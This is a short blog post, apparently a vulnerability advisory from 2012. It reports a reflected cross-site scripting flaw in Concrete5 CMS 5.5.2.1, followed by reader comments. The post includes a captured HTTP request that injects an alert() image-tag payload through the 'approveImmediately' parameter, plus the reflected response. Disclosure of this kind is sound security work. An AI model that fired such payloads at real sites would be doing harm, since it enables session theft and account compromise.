Thursday, 26 April 2012

[EN] Concrete5.5.2.1 CMS is vulnerable to XSS (for logged-in users)


[ TITLE ....... ][ Concrete5.5.2.1 CMS is vulnerable to XSS (for logged-in users)
[ DATE ........ ][ 23.04.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://concrete5.org
[ VERSION ..... ][ 5.5.2.1
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [

[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...

[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?
This is cross-site scripting.

[--------------------------------------------[
[ 3. Where is bug :)
Below I present You some traffic from Burp Proxy:

...[cut from Burp]...
GET /concrete5.5.2.1/index.php/tools/required/edit_collection_popup.php?
approveImmediately=%22%3e%3cimg%20src%3dx%20onerror%3dalert(123123123)%3e&cID=102&ctask=edit_metadata HTTP/1.1
Host: localhost
(...)
X-Requested-With: XMLHttpRequest
Cookie: CONCRETE5=...

...[end of cut]...

So vulnerable parameter is "approveImmediately", check it out:

...[answer (response) from Burp]...
(...)
<form method="post" name="permissionForm" id="ccmMetadataForm" action="http://localhost/concrete5.5.2.1/index.php?cID=102&ccm_token=...:...">
<input type="hidden" name="approveImmediately" value=""><img src=x onerror=alert(123123123)>" />
(...)

...[end of response]...


[--------------------------------------------[
[ 4. More...

- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Ask me about new projects @ mail. ;)
]
[ Best regards
[

4 comments:

  1. Hey...concreet5 is a very good cms...i am very happy working on it

    ReplyDelete
    Replies
    1. Yes me too. Working with this CMS was a very good lesson for me. ;)

      Thanks for comments ;)

      If You have more questions, feel free to ask my via e-mail.
      Enjoy o/

      Delete
  2. This comment has been removed by the author.

    ReplyDelete
  3. The post is very nicely written and it contains many useful facts. I am happy to find your distinguished way of writing the post. Now you make it easy for me to understand and implement. Thanks for sharing with us. Content management system

    ReplyDelete

What do You think...?